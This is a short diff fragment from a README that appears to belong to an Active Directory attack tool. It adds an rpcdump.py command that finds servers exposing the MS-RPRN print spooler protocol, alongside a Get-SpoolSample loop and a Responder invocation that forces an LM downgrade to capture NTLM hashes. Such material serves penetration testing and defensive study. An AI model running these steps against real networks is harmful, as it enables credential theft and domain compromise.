NotMedic/NetNTLMtoSilverTicket/Readme.md

     ForEach ($server in Get-Content servers.txt) {Get-SpoolSample $server}

+You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol

+    rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

 ### Start Responder with the --lm flag to force a LM downgrade

     ./Responder.py -I eth0 --lm